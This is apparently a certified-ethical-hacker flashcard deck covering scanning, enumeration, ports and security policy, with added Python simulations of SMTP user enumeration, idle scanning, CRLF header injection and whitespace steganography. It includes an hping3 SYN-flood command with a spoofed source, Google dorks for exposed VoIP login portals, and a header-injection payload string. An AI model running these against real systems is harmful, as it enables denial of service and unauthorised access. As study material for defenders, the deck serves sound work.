Refers to monitoring and analyzing the target organizations website for information
Clearing Tracks or Covering Tracks
Refers to the activities carried out by an attacker to hide malicious acts
Authenticity
Refers to the characteristics of a communication, document or any data that ensures the quality of being genuine
Maintaining Access
Refers to the phase when the attacker tries to retain his or her ownership of the system
Gaining Access
Refers to the point where the attacker obtains access to the operating system or application on the computer or network
Scanning
Refers to the pre-attack phase when the attacker scans the network for specific information on the basis of information gathered during reconnaissance
Reconnaissance
Refers to the preparatory phase where an attacker seeks to gather information about a target prior to launching an attack
ARIN AFRINIC RIPE LACNIC APNIC
Regional Internet Registries (RIRs)
remotely installs applications, executes programs/scripts
RemoteExec ___, and updates files and folders on Windows system throughout the network
RP
Responsible person
[intitle:]
Restricts the results to documents containing the search keyword in the title
[site:]
Restricts the results to those websites in the given domain
[allinurl:]
Restricts the results to those with all of the search keywords in the URL
UDP/TCP 5060 (SIP signalling) and TCP 5061 (SIP over TLS). Ports 2000/2001 belong to Cisco's Skinny (SCCP) call-control protocol, not SIP, and 5050 is not a SIP port either, although some CEH material lists all of them together.
SIP service generally uses what ports?
TCP/UDP 445
SMB over TCP (Direct Host)
RCPT TO
SMTP (Simple Mail Transfer Protocol) command to define recipients.
EXPN
SMTP (Simple Mail Transfer Protocol) command to provide the actual delivery addresses of mailing lists and aliases.
VRFY
SMTP (Simple Mail Transfer Protocol) command to validate users.
Send email messages
SMTP is used to perform which function?
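The VRFY, EXPN and RCPT TO cards above describe the three SMTP commands an attacker uses to enumerate mailboxes. As an added example that is not part of the original deck, the following Python runs that exchange against a toy in-process MTA (a constructed stand-in for a real server; `example.test` and the user names are made up) and records both sides of the conversation. It also shows the check a practitioner wants: when VRFY answers 252 (disabled, as sendmail's `novrfy` privacy option does) the client falls back to RCPT TO, which still distinguishes valid from invalid users unless the server is configured to accept every recipient.

```python
class MockSmtpServer:
    """Toy MTA: just enough of RFC 5321 to show VRFY/EXPN/RCPT TO enumeration."""

    def __init__(self, users, aliases, allow_vrfy=True, allow_expn=True):
        self.users = {u.lower() for u in users}
        self.aliases = {k.lower(): v for k, v in aliases.items()}
        self.allow_vrfy = allow_vrfy
        self.allow_expn = allow_expn
        self.mail_from = None
        self.transcript = []   # both sides, in order: "C: ..." / "S: ..."

    def send(self, line: str) -> str:
        """Client sends one command line; returns the server's reply."""
        self.transcript.append("C: " + line)
        reply = self._handle(line)
        self.transcript.append("S: " + reply.replace("\r\n", "\r\nS: "))
        return reply

    def _handle(self, line: str) -> str:
        verb, _, arg = line.strip().partition(" ")
        verb, arg = verb.upper(), arg.strip()
        if verb in ("HELO", "EHLO"):
            return "250 mail.example.test Hello"
        if verb == "VRFY":
            if not self.allow_vrfy:
                return "252 2.5.2 Cannot VRFY user, but will accept message and attempt delivery"
            if arg.lower() in self.users:
                return f"250 2.1.5 <{arg.lower()}@example.test>"
            return "550 5.1.1 User unknown"
        if verb == "EXPN":
            if not self.allow_expn:
                return "502 5.5.1 EXPN not supported"
            members = self.aliases.get(arg.lower())
            if not members:
                return "550 5.1.1 List unknown"
            lines = [f"250-<{m}@example.test>" for m in members]
            lines[-1] = lines[-1].replace("250-", "250 ", 1)   # last line ends the multi-line reply
            return "\r\n".join(lines)
        if verb == "MAIL":
            self.mail_from = arg
            return "250 2.1.0 OK"
        if verb == "RCPT":
            if self.mail_from is None:
                return "503 5.5.1 Need MAIL command"
            if arg.upper().startswith("TO:"):
                arg = arg[3:]
            local = arg.strip("<> ").split("@")[0].lower()
            return "250 2.1.5 OK" if local in self.users else "550 5.1.1 User unknown"
        if verb == "QUIT":
            return "221 2.0.0 Bye"
        return "500 5.5.2 Command not recognized"


def enumerate_users(server, candidates):
    """Return ({candidate: exists}, method). Tries VRFY first, RCPT TO if VRFY is neutered."""
    server.send("HELO scanner.example.test")
    results, method = {}, "VRFY"
    for user in candidates:
        code = server.send(f"VRFY {user}")[:3]
        if code == "252":
            method = "RCPT TO"
            break
        results[user] = code == "250"
    if method == "RCPT TO":
        server.send("MAIL FROM:<probe@scanner.example.test>")
        for user in candidates:
            code = server.send(f"RCPT TO:<{user}@example.test>")[:3]
            results[user] = code == "250"
    server.send("QUIT")
    return results, method


def expand_alias(server, alias):
    """EXPN a mailing list and return the delivery addresses it exposes."""
    reply = server.send(f"EXPN {alias}")
    if not reply.startswith("250"):
        return []
    return [line.split("<", 1)[1].rstrip(">") for line in reply.split("\r\n") if "<" in line]


if __name__ == "__main__":
    srv = MockSmtpServer(users=["alice", "bob"], aliases={"staff": ["alice", "bob"]})
    print(enumerate_users(srv, ["alice", "bob", "mallory"]))
    print(expand_alias(srv, "staff"))
    print("\n".join(srv.transcript))
```

Disabling VRFY and EXPN is the usual hardening step, but the transcript from the hardened server shows why it is only a partial fix: RCPT TO still leaks user existence through 250 versus 550, so rate-limiting or a catch-all recipient policy is needed as well.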
Three-way handshake
SYN SYN/ACK ACK
IDLE Scan: Step 2 (Port Closed)
SYN Packet to port 80 spoofing zombie IP address --> (target) (zombie) <-- RST
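The three IDLE scan step cards in this deck (Step 1 and Step 3 earlier, Step 2 here) show the IPID values 31337 and 31339 but not the arithmetic or its failure modes. As an added example, not part of the original deck, this Python simulates the zombie and the target in-process and derives the verdict from the IPID delta, handling the two checks a practitioner needs: the 16-bit field wraps (65535 then 1 is still an increment of 2), and a zombie that is not actually idle produces a delta greater than 2, which must be reported as inconclusive rather than as open. No packets are sent; the IPID sequence is generated by the simulated zombie.

```python
from typing import Optional


class Zombie:
    """Idle host whose OS uses a single global, incrementing IP ID (the scan's precondition)."""

    def __init__(self, start_ipid: int):
        self.next_ipid = start_ipid

    def _emit(self) -> int:
        ipid = self.next_ipid
        self.next_ipid = (self.next_ipid + 1) & 0xFFFF   # 16-bit field wraps
        return ipid

    def receive(self, flags: str) -> Optional[int]:
        """An unsolicited SYN/ACK makes the zombie answer RST (consuming an IP ID);
        an unsolicited RST is ignored. Returns the IP ID of the packet it sent."""
        if flags == "SYN/ACK":
            return self._emit()
        return None

    def background_traffic(self, packets: int) -> None:
        """Anything else the zombie sends between our probes."""
        for _ in range(packets):
            self._emit()


class Target:
    def __init__(self, open_ports):
        self.open_ports = set(open_ports)

    def receive_spoofed_syn(self, port: int, zombie: Zombie) -> str:
        """Replies go to the spoofed source (the zombie), never to the attacker."""
        if port in self.open_ports:
            zombie.receive("SYN/ACK")     # zombie answers RST, its IP ID advances
            return "SYN/ACK -> zombie"
        zombie.receive("RST")             # RST draws no reply from the zombie
        return "RST -> zombie"


def ipid_delta(before: int, after: int) -> int:
    return (after - before) & 0xFFFF      # correct across the 65535 -> 0 wrap


def verdict(before: int, after: int) -> str:
    d = ipid_delta(before, after)
    if d == 1:
        return "closed|filtered"          # only our own step-3 probe advanced the counter
    if d == 2:
        return "open"                     # the target's SYN/ACK made the zombie send one extra RST
    if d == 0:
        return "zombie not incrementing (unusable)"
    return f"inconclusive: zombie sent {d - 1} other packets, not idle enough"


def idle_scan(zombie: Zombie, target: Target, port: int, noise: int = 0) -> dict:
    step1 = zombie.receive("SYN/ACK")                  # step 1: probe the zombie's IP ID
    step2 = target.receive_spoofed_syn(port, zombie)   # step 2: SYN to target, source = zombie
    zombie.background_traffic(noise)
    step3 = zombie.receive("SYN/ACK")                  # step 3: probe the zombie again
    return {"ipid_step1": step1, "step2": step2, "ipid_step3": step3,
            "verdict": verdict(step1, step3)}


if __name__ == "__main__":
    print(idle_scan(Zombie(31337), Target({80}), 80))          # deck's example: 31337 -> 31339
    print(idle_scan(Zombie(31337), Target({80}), 22))          # closed: 31337 -> 31338
    print(idle_scan(Zombie(65535), Target({80}), 80))          # wrap: 65535 -> 1
    print(idle_scan(Zombie(100), Target({80}), 80, noise=5))   # busy zombie: inconclusive
```

nmap's `-sI` repeats the probe and requires consistent results for exactly this reason; a single delta of 2 from a chatty zombie proves nothing.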
intitle:string (examples: intitle:login; allintitle:login password)
Searches for pages that contain the string in the title.
filetype: example: filetype:doc
Searches only for files of a specific type (DOC, XLS, and so on).
IPsec
Session hijacking can be performed on all of the following protocols except which one? FTP SMTP HTTP IPsec
Authentication
Session hijacking can be thwarted with which of the following? SSH FTP Authentication Sniffing
RedirectEXE injectDLL GetProcAddress
Shims like ___ can be used by attackers to escalate privileges, install backdoors, disable Windows defender, etc.
related:webpagename
Shows web pages similar to webpagename.
TCP 25
Simple Mail Transfer Protocol (SMTP)
UDP 161
Simple Network Management Protocol (SNMP)
gives attackers full access to your system
Sirefef Rootkit or ZeroAccess ___ while using stealth techniques in order to hide its presence from the affected device
altering the internal processes
Sirefef hides itself by ___ on an operating system so that your antivirus and anti-spyware can't detect it
Phishing
Social engineering can be used to carry out email campaigns known as _____?
Human nature Technology People Physical
Social engineering preys on many weaknesses including _____
SEC Info (www.secinfo.com) Experian (www.experian.com) Market Watch (www.marketwatch.com) Wall Street Monitor (www.twst.com) Euromonitor (www.euromonitor.com)
Some websites for competitive intelligence. Company plans and financials.
EDGAR Database (www.sec.gov/edgar.shtml) Hoovers (www.hoovers.com) LexisNexis (www.lexisnexis.com) Business Wire (www.businesswire.com)
Some websites for competitive intelligence. Information on company origins and how it developed over the years can be found in places like:
Authenticity
Sometimes included as a security element, refers to the characteristic of data that ensures it is genuine.
establishes a full connection
TCP Connect scan ___ and tears it down by sending a RST packet
super user privileges
TCP Connect scan does not require ___
SYN (Synchronize)
TCP Flag, Initiates a connection between hosts
Layer 4 Transport
TCP, UDP resides at what layer of the OSI model?
Anonymizers
Tails G-Zapper Proxify Guardster Psiphon Spotflux Anonymous Web Surfing Tool Ultrasurf Hide Your IP Address Head Proxy Anonymizer Universal Hope Proxy
live operating system
Tails is a _____, that user can start on any computer from a DVD, USB stick, or SD card.
public
The ___ community string is used for read-only searches.
NTLMv2 hash
The attacker cracks the ____ obtained from the victim's authentication process
Tcpdump
The Unix/Linux equivalent of WinDump is known as what?
Authorization
The conveying of official access or legal power to a person or entity.
Security target (ST)
The documentation describing the TOE (Target of evaluation) and security requirements
organizationally unique identifier (OUI)
The first half of the MAC address, consisting of 3 bytes (24 bits), is known as the ____ and is used to identify the card manufacturer.
Gray hats
The hardest group to categorize, these hackers are neither good nor bad.
Internet and other publicly accessible sources
The pen tester attempts to gather as much information as possible about the target organization from the _____
Authentication
The process of determining whether a network entity (user or service) is legitimate--usually accomplished through a user ID and password.
cryptography
The science or study of protecting information, whether in transit or at rest, by using techniques to render the information unusable to anyone who does not possess the means to decrypt it.
Asynchronous transmission
The transmission of digital signals without precise clocking or synchronization
Password Policy
This defines everything imaginable about passwords within the organization, including length, complexity, maximum and minimum age, and reuse.
Information Protection Policy
This defines information sensitivity levels and who has access to those levels. It also addresses how data is stored, transmitted, and destroyed.
Access Control Policy
This identifies the resources that need protection and the rules in place to control access to those resources
ICMP Echo Scanning
This is not really port scanning, since ICMP does not have a port abstraction. But it is sometimes useful to determine which hosts in a network are up by pinging them all
PTR (Pointer)
This maps an IP address to a hostname (providing for reverse DNS lookups).
Special-Access Policy
This policy defines the terms and conditions of granting special access to system resources
SRV (Service)
This record defines the hostname and port number of servers providing specific services, such as a Directory Services server.
IDLE
This uses a spoofed IP address (zombie system) to elicit port responses during a scan.
risk assessment approach
Threat modeling is a ____ for analyzing security of an application by capturing, organizing, and analyzing all the information that affects the security of an application
A)CRLF injection
Through a company website, customers use a standard HTML form to submit service requests to the web server. The web server in turn creates an SMTP email and sends it on to a customer support email address. The HTML form receives the following subject line: Email is not working<CR><LF>Bcc: [email protected] Which type of attack is being attempted? A)CRLF injection B)Session splicing C)XSS D)Email spoofing
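The CRLF injection item above is worth seeing in code, because the bug and its fix are both one line. As an added example that is not part of the original deck, the following Python builds the support e-mail the way the vulnerable form handler does (string concatenation into the header block), parses the result to show that the injected `Bcc:` became a real header, and then shows the hardened builder, which rejects any header value containing CR, LF or NUL instead of trying to strip them. The attacker address is constructed (the one in the question is redacted).

```python
import re

# CR, LF or NUL in a header value is never legitimate user input for a subject line.
HEADER_BREAK = re.compile(r"[\r\n\x00]")


def build_message_vulnerable(to: str, subject: str, body: str) -> str:
    """Header block built by concatenation: whatever the form sends lands in it verbatim."""
    return f"To: {to}\r\nSubject: {subject}\r\n\r\n{body}"


def parse_rfc5322(raw: str):
    """Simplified RFC 5322 parse (no header folding): returns (headers, body).

    Header names are lower-cased; values are lists because a header may repeat.
    """
    head, _sep, body = raw.partition("\r\n\r\n")
    headers = {}
    for line in head.split("\r\n"):
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers, body


def contains_header_injection(value: str) -> bool:
    """Detection check for form input destined for a mail header (also catches bare LF)."""
    return HEADER_BREAK.search(value) is not None


def build_message_hardened(to: str, subject: str, body: str) -> str:
    """Refuse, rather than sanitise: a subject with line breaks is an attack, not a typo."""
    for name, value in (("To", to), ("Subject", subject)):
        if contains_header_injection(value):
            raise ValueError(f"{name} header contains line-break characters")
    return f"To: {to}\r\nSubject: {subject}\r\n\r\n{body}"


# Constructed form input matching the question, with a made-up attacker address.
MALICIOUS_SUBJECT = "Email is not working\r\nBcc: attacker@example.test"

if __name__ == "__main__":
    raw = build_message_vulnerable("support@example.test", MALICIOUS_SUBJECT, "Please help.")
    headers, _ = parse_rfc5322(raw)
    print("vulnerable builder produced headers:", headers)   # 'bcc' is present
    try:
        build_message_hardened("support@example.test", MALICIOUS_SUBJECT, "Please help.")
    except ValueError as exc:
        print("hardened builder rejected input:", exc)
```

Rejecting is preferable to stripping because stripping leaves the attacker free to probe for encodings the strip misses; the stdlib's `email.message.EmailMessage` under `email.policy.default` applies the same rule and raises `ValueError` when a header value contains a line break, so using it instead of hand-built strings gives the check for free.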
A)Throttling
To prevent DoS attacks, you set up routers that access a server with logic to adjust incoming traffic to levels that will be safe for a server to process. What is this process referred to? A)Throttling B)Filtering C)QoS D)Clustering
Phishing Tailgating/Piggybacking
Training and education of end users can be used to prevent _____
When this flag is set, it indicates the data inside is being sent out of band. Cancelling a message mid-stream is one example.
URG (Urgent)
Layer 1 Physical
USB Standards, Bluetooth, Etc. resides at what layer of the OSI model?
bluesnarfing
Unauthorized access to information such as a calendar, contact list, e-mails, and text messages on a wireless device through a Bluetooth connection.
determine the OS
Use the Netcraft tool to _____ in use by the target organization.
Netcraft tool
Use the ___ to determine the Operating Systems in use by the target organization
HTTP GET commands
Victim here will act as a web client who is executing ___ whereas the attacker behaves like a web server and responds to the requests (Covering Tracks on Network Using Reverse HTTP Shells)
Denial-of-Service (DoS) Session Hijacking Caller ID spoofing Eavesdropping Spamming over Internet Telephony (SPIT) VoIP phishing (Vishing)
VoIP enumeration information can be used to launch various VoIP attacks such as ____
SIP (Session Initiation Protocol)
VoIP uses ___ protocol to enable voice and video calls over an IP network
National Vulnerability Database (nvd.nist.gov) Securitytracker (www.securitytracker.com) Hackerstorm Vulnerability Database Tool (www.hackerstorm.com) Security-Focus (www.securityfocus.com)
Vulnerability research should include looking for the latest exploit news, any zero-day outbreaks in viruses and malware, and what recommendations are being made to deal with them. What are some tools to help with this?
DNS Tools UltraTools Mobile Whois Lookup Tool
WHOIS Lookup Tools for Mobile
An unauthorized, hidden communication path that moves data in violation of the security policy (a backdoor often uses one, for example by tunnelling its traffic inside ICMP or HTTP)
What is a covert channel?
Ability to filter for packet fragments
What is the main improvement of ipchains over ipfwadm?
Insider affiliate
What threat type is someone with limited authorized access?
operating system level application level network level
What three levels can attackers gain access to?
Tails
What tool aims at preserving privacy and anonymity and helps you to: Use the Internet anonymously and circumvent censorship Leave no trace on the computer Use state-of-the-art cryptographic tools to encrypt files, emails and instant messaging
CurrPorts
What tool displays a list of all currently opened TCP/IP and UDP ports on your local computer, including information about the process that opened the port, the process name, full path, version information, the time it created, and the user who created it.
StegoStick
What tool hides any file or message into an image (BMP, JPG, GIF), Audio/Video (MPG, WAV, etc) or any other file format (PDF, EXE, CHM, etc)
McAfee's Visual Trace NeoTrace Trout VisualRoute Magic NetTrace Network Pinger GEO Spider Ping Plotter
What tools can you use to build a comprehensive map of a network showing geographic locations and such?
A host-based IDS
What type of IDS can recognize an attack made with the use of fragroute?
Nbtstat
Which command can be used to view NetBIOS information?
netsh firewall set opmode enable (legacy syntax; on Windows Vista and later use netsh advfirewall set allprofiles state on)
Which command enables the Windows firewall?
A)Security awareness training
Which of the following is NOT a component of risk assessment? A)Security awareness training B)Physical safeguards C)Administrative safeguards D)Logical safeguards
C)Host-based IDS on the exposed system
Which of the following is a possible mitigation to the use of fragroute by an attacker? A)SPAN B)RSPAN C)Host-based IDS on the exposed system D)Expression matching
END
Which of the following is not a flag on a packet?
D. Teardrop
Which of the following takes advantage of weaknesses in fragment reassembly in TCP/IP? A. Stuxnet B. Smurf C. SYN Flood D. Teardrop
NULL
Which of the following types of scan has no flags set?
22
Which port number is used for SSH?
Malware covers all malicious software
Which statement(s) define malware most accurately?
D) Scanning
Which step comes right after footprinting? A) Privilege escalation B) Gaining access C) System attacks D) Scanning
No response (open or filtered); RST/ACK (closed)
XMAS scans, if the port is open _____, if the port is closed ____ responses.
Microsoft Windows
Xmas scan will not work against any current version of ___ (it answers RST to FIN/URG/PSH probes regardless of port state, so every port appears closed)
D) Ping Sweep
You are attempting to identify live targets on a particular subnet. You kick off a scan whereby ICMP packets are sent to every IP address within the subnet and await responses. What is this activity called? A) Enumeration B) Ping Crawl C) Port Scan D) Ping Sweep
telephone calls to the help desk or technical department
example of Active Reconnaissance
searching public records or news releases
example of Passive Reconnaissance
performs an ICMP ping
hping3 -1 172.17.15.12
performs a UDP scan on port 80
hping3 -2 192.168.12.55 -p 80
scans ports 20 through 100 on the target (-8 is --scan; a TCP flag such as -S and a target host are required)
hping3 -8 20-100 -S <target>
looks for HTTP signature packets on eth0
hping3 -9 HTTP -I eth0
SYN flood against 192.168.10.10 port 22 with the source address spoofed as 192.168.10.22 (-a sets the spoofed source)
hping3 -S 192.168.10.10 -a 192.168.10.22 -p 22 --flood
Pages containing D-Link login portals
intitle:"D-Link VoIP Router" "Welcome"
Pages containing login portals
intitle:"Login Page" intext:"Phone Adapter Configuration Utility"
Search Linksys phones
intitle:"SPA Configuration"
Finds the Asterisk web management portal
intitle:asterisk.management.portal web-access
Find the Cisco phone details
inurl:"NetworkConfiguration" cisco
Find Cisco call manager
inurl:"ccmuser/login.asp"
Competitive intelligence
is non-interfering and subtle in nature
PsKill
kill processes by name or process ID
Internet Assigned Numbers Authority (IANA)
maintains something called the Service Name and Transport Protocol Port Number Registry, which is the official list for all port number reservations.
SYN port scan on a target as quietly as possible
nmap 192.168.1.0/24 -sS -T0
An aggressive XMAS scan
nmap 192.168.1.0/24 -sX -T4
Scan multiple IPs
nmap 192.168.1.100 192.168.1.101
nmap <scan options> <target>
nmap syntax
Dynamic ports
port numbers 49,152 - 65,535
is nothing more than a system you set up to act as an intermediary between you and your targets.
proxy
PsShutdown
shuts down and optionally reboots a computer
active footprinting
social engineering, human interaction, and anything that requires the hacker to interact with the organization is considered what type of footprinting?
IP address decoy
technique refers to generating or manually specifying IP addresses of the decoys in order to evade IDS/firewall
E-mail Policy or E-mail Security Policy
this addresses the proper use of the company e-mail system.
Full Connect (also called TCP connect or full open scan)
this runs through a full connection (three-way handshake) on all ports, tearing it down with an RST at the end.
ICMP ECHO packets (UDP datagrams in Linux versions)
traceroute or tracert uses what to report information on each "hop" (router) from the source to the destination?
Cracker malicious hacker
uses those skills, tools, and techniques either for personal gain or destructive purposes or, in purely technical terms, to achieve a goal outside the interest of the system owner.
confidentiality integrity availability
what is the trinity of IT security? (3 parts)
CCleaner
what tool cleans traces of temporary files, log files, registry files, memory dumps, and also your online activities such as your Internet history
Anonymous footprinting
where you try to obscure the source of all this information gathering
Normal output
-oN
B) Xterm
Of the commands listed, which are most likely to NOT be Trojaned by an attacker? A) Netstat B) Xterm C) Ps D) Top
B) MBSA
Of the following, which is best for checking patch levels on a Windows machine? A) Nslookup B) MBSA C) Metasploit D) Sigverif
C)Hot and cold aisles
Of the listed physical security controls, which is usually only deployed in the data center? A)Fire suppression B)CCTV cameras C)Hot and cold aisles D)Security guards
NetScan Tools Pro SuperScan Network Inventory Explorer PRTG Network Monitor Global Network Inventory Net Tools SoftPerfect Network Scanner IP-Tools Advanced Port Scanner MegaPing CurrPorts
Scanning Tools
NetScanTools Pro SuperScan PRTG Network Monitor OmniPeek MiTeC Network Scanner NEWT Professional MegaPing
Scanning Tools
Umit Network Scanner Fing IP Network Scanner PortDroid Network Analysis Pamn IP Scanner Network Discovery
Scanning Tools for Mobile
Bit
What PDU is at Layer 1 of OSI model
Training
What is the best option for thwarting social engineering attacks?
True positive
What is the term for a system correctly allowing traffic or actions that should be allowed?
True negative
What is the term for a system correctly preventing traffic or actions that should not be allowed?
False negative
What is the term for a system failing to prevent traffic or actions that should not be allowed?
Denial of service
What type of cybersecurity attack is mitigated by redundancy?
Cookie hijacking
Which attack can be used to take over a previous session?
B)CA
Which component in the PKI issues the certificate? A)CPS B)CA C)RA D)VA
C)OSSTMM
Which of the following testing methodologies addresses security controls? A)SOAP B)CORBA C)OSSTMM D)OWASP
B)Distributed denial of service E)Password cracking
You are running a penetration test for a small IT service provider during normal operating hours. Which of the following activities is most likely to be restricted in the rules of engagement (ROE)? (Choose all that apply.) A)Social engineering B)Distributed denial of service C)Network sniffing D)Port scanning E)Password cracking
C. CNAME
You have an FTP service and an HTTP site on a single server. Which DNS record allows you to alias both services to the same record (IP address)? A. NS B. SOA C. CNAME D. PTR
A)It is very easy to detect on the computer or device being scanned.
You have decided to use Nmap to scan your network to aid in determining any network security issues that exist. The first type of scan that you decide to run is the TCP connect scan. Which statement is true regarding this type of scan? A)It is very easy to detect on the computer or device being scanned. B)It sends a packet with only the FIN flag set in the TCP header. C)It sends a packet with no flags switched on in the TCP header. D)It can detect three port states: open, closed, and filtered.
A)Deploy a switch, and implement a VLAN for the Research department devices and computers.
You need to isolate the communication for desktop computers in the Research department within the company's network. The solution must improve overall performance and security. Which solution should you suggest? A)Deploy a switch, and implement a VLAN for the Research department devices and computers. B)Deploy Bluetooth, and implement a PAN for the Research department devices and computers. C)Deploy 802.11b, and implement a WLAN for the Research department devices and computers. D)Deploy 802.11g, and implement a WLAN for the Research department devices and computers.
Subnet Mask Calculators
Attackers calculate subnet masks using ____ to identify the number of hosts present in the subnet
Backdoors RootKits Trojans
Attackers may prevent the system from being owned by other attackers by securing their exclusive access with ____, ____, or ____.
UPnP SSDP M-SEARCH
Attackers may use the ___ information discovery tool to check whether the machine is vulnerable to UPnP exploits
network traffic, recorded logs, "Received from:" header lines
Attackers need to harvest IPv6 addresses from ____ and other header lines in archived email or Usenet news messages
identify vulnerabilities
Footprinting allows attacker to ___ in the target systems in order to select appropriate exploits
same
For a block cipher algorithm, the length of the input block is the ___ as the length of the output block.
Session
Layer 5 of OSI model
FF:FF:FF:FF:FF:FF
MAC address of broadcast messages
fingerprinting
Port sweeping and enumeration on a machine is also known as ____.
Regional Internet Registry (RIR)
You can find the range of IP addresses and the subnet mask used by the target organization from ______
Nmap SolarWinds Netcraft HTTrack (note: HTTrack mirrors websites; it reveals the server platform only indirectly through the copied content)
You can fingerprint operating systems with several tools:
Network Topology Mapper
discovers a network and produces a comprehensive network diagram
Metagoofil
extracts metadata of public documents (pdf, doc, xls, ppt, docx, pptx, xlsx, etc.) belonging to a target company
Control Objectives for Information and Related Technology (COBIT)
is "an IT governance framework and supporting toolset that allows managers to bridge the gap between control requirements, technical issues and business risks. It enables clear policy development, good practice, and emphasizes regulatory compliance."
Maltego (www.paterva.com/web5/)
is "an open source intelligence and forensics application" designed explicitly to demonstrate social engineering (and other) weaknesses for your environment.
Exploit Database
is a Common Vulnerabilities and Exposures (CVE) compliant archive of public exploits and corresponding vulnerable software
resource identifier (RID)
relative identifier (RID): is the last portion of the overall SID, identifying a specific user, group or computer within the domain or local SAM that the rest of the SID names.
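The RID definition here and the RID 500/501/1000+ cards earlier are applied by parsing SIDs. As an added example that is not part of the original deck, this Python parses the textual `S-1-5-21-...-RID` form, converts to and from the binary layout Windows actually stores (revision, sub-authority count, 48-bit identifier authority big-endian, then little-endian 32-bit sub-authorities), and classifies the RID. The domain sub-authorities in the sample SID are made up. The check worth remembering: renaming the Administrator account changes nothing here, because RID 500 is fixed at installation.

```python
import struct

# Well-known RIDs in a domain or local SAM (S-1-5-21-...) SID.
WELL_KNOWN_RIDS = {
    500: "Administrator (built-in)",
    501: "Guest (built-in)",
    512: "Domain Admins (group)",
    513: "Domain Users (group)",
}


def parse_sid_string(sid: str) -> dict:
    """'S-1-5-21-a-b-c-RID' -> components; the RID is the last sub-authority."""
    parts = sid.split("-")
    if len(parts) < 4 or parts[0] != "S":
        raise ValueError("not a SID string")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return {"revision": revision, "authority": authority, "subauthorities": subs,
            "domain": "-".join(parts[:-1]), "rid": subs[-1]}


def rid_role(rid: int) -> str:
    if rid in WELL_KNOWN_RIDS:
        return WELL_KNOWN_RIDS[rid]
    if rid >= 1000:
        return "user/group created after installation"
    return "other well-known or built-in principal"


def sid_from_bytes(data: bytes) -> str:
    """Binary SID: revision(1) count(1) authority(6, big-endian) subs(count x uint32 little-endian)."""
    revision, count = data[0], data[1]
    if len(data) != 8 + 4 * count:
        raise ValueError("SID length does not match sub-authority count")
    authority = int.from_bytes(data[2:8], "big")
    subs = struct.unpack("<%dI" % count, data[8:])
    return "S-%d-%d-%s" % (revision, authority, "-".join(str(s) for s in subs))


def sid_to_bytes(sid: str) -> bytes:
    p = parse_sid_string(sid)
    subs = p["subauthorities"]
    return (bytes([p["revision"], len(subs)]) + p["authority"].to_bytes(6, "big")
            + struct.pack("<%dI" % len(subs), *subs))


def describe_account(sid: str) -> str:
    p = parse_sid_string(sid)
    # Sub-authority 21 (SECURITY_NT_NON_UNIQUE) marks a domain/machine SAM SID;
    # for anything else (e.g. S-1-5-18, LOCAL SYSTEM) the last value is not a RID.
    if p["subauthorities"][:1] != [21]:
        return f"{sid}: not a domain/machine SAM SID (no S-1-5-21 prefix); RID interpretation does not apply"
    return f"{sid}: domain {p['domain']}, RID {p['rid']} -> {rid_role(p['rid'])}"


# Constructed SID (domain sub-authorities are made up); RID 500 is the built-in Administrator.
SAMPLE_ADMIN_SID = "S-1-5-21-1004336348-1177238915-682003330-500"

if __name__ == "__main__":
    print(describe_account(SAMPLE_ADMIN_SID))
    print(describe_account("S-1-5-21-1004336348-1177238915-682003330-1105"))
    print(describe_account("S-1-5-18"))
    print(sid_to_bytes(SAMPLE_ADMIN_SID).hex())
```

This is the same logic enumeration tools use when they walk RIDs after obtaining the domain SID: the domain prefix is constant, and the interesting accounts are found by appending 500, 501 and then 1000 upwards.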
Online Reputation Management (ORM)
is a process of monitoring a company's reputation on Internet and taking certain measures to minimize the negative search results/reviews and thereby improve its brand reputation.
Maltego
is a program that can be used to determine the relationships and real world links between people, groups of people (social networks), companies, organizations, websites, Internet infrastructure, phrases, documents, and files
Proxy Workbench
is a proxy server that displays data passing through it in real time, allows you to drill into particular TCP/IP connections, view their history, save the data to a file, and view the socket connection diagram
Payment Card Industry Data Security Standard (PCI-DSS)
is a security standard for organizations handling credit cards, ATM cards, and other point-of-sales cards.
Bot
is a software application that can be controlled remotely to execute or automate predefined tasks
Payload
is the part of an exploit code that performs the intended malicious action, such as destroying, creating backdoors, and hijacking computer
Document steganography
is the technique of hiding secret messages transferred in the form of documents. It includes the addition of white spaces and tabs at the end of lines
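The whitespace variant described above is simple enough to implement end to end. As an added example that is not part of the original deck, this Python embeds a secret in a cover text by appending runs of spaces (bit 0) and tabs (bit 1) to each line behind a 16-bit length prefix, extracts it again, and includes the detection heuristic a defender would run: counting lines that end in whitespace. The cover text and secret are constructed; embedding strips any trailing whitespace the cover already had, which is one reason the technique survives copy-and-paste but not an editor that trims lines on save.

```python
def _bits(data: bytes):
    """Yield the bits of a byte string, most significant bit first."""
    for byte in data:
        for i in range(7, -1, -1):
            yield (byte >> i) & 1


def embed(cover: str, secret: bytes, bits_per_line: int = 8) -> str:
    """Append the secret as trailing whitespace: ' ' = 0, '\\t' = 1, 16-bit length prefix first."""
    if len(secret) > 0xFFFF:
        raise ValueError("secret too long for the 16-bit length prefix")
    payload = len(secret).to_bytes(2, "big") + secret
    bits = list(_bits(payload))
    lines = cover.split("\n")
    if len(lines) * bits_per_line < len(bits):
        raise ValueError(f"cover needs at least {-(-len(bits) // bits_per_line)} lines")
    out = []
    for line in lines:
        chunk, bits = bits[:bits_per_line], bits[bits_per_line:]
        out.append(line.rstrip(" \t") + "".join("\t" if b else " " for b in chunk))
    return "\n".join(out)


def extract(stego: str) -> bytes:
    """Read trailing whitespace line by line, rebuild bytes, honour the length prefix."""
    bits = []
    for line in stego.split("\n"):
        stripped = line.rstrip(" \t")
        bits.extend(1 if c == "\t" else 0 for c in line[len(stripped):])
    whole = len(bits) - len(bits) % 8
    raw = bytes(int("".join(map(str, bits[i:i + 8])), 2) for i in range(0, whole, 8))
    length = int.from_bytes(raw[:2], "big")
    return raw[2:2 + length]


def suspicious_trailing_whitespace(text: str) -> int:
    """Detection heuristic: number of lines ending in spaces/tabs. Normal prose has ~0."""
    return sum(1 for line in text.split("\n") if line != line.rstrip(" \t"))


# Constructed cover text with no trailing whitespace of its own.
COVER_TEXT = "\n".join([
    "Quarterly update for the engineering team.",
    "Please review the attached figures before Friday.",
    "The build server will be patched over the weekend.",
    "Expect a short outage of the staging environment.",
    "Contact the service desk with any questions.",
    "Thanks for your patience.",
])

if __name__ == "__main__":
    stego = embed(COVER_TEXT, b"9pm")
    print(repr(stego))
    print("extracted:", extract(stego))
    print("lines with trailing whitespace:", suspicious_trailing_whitespace(stego))
```

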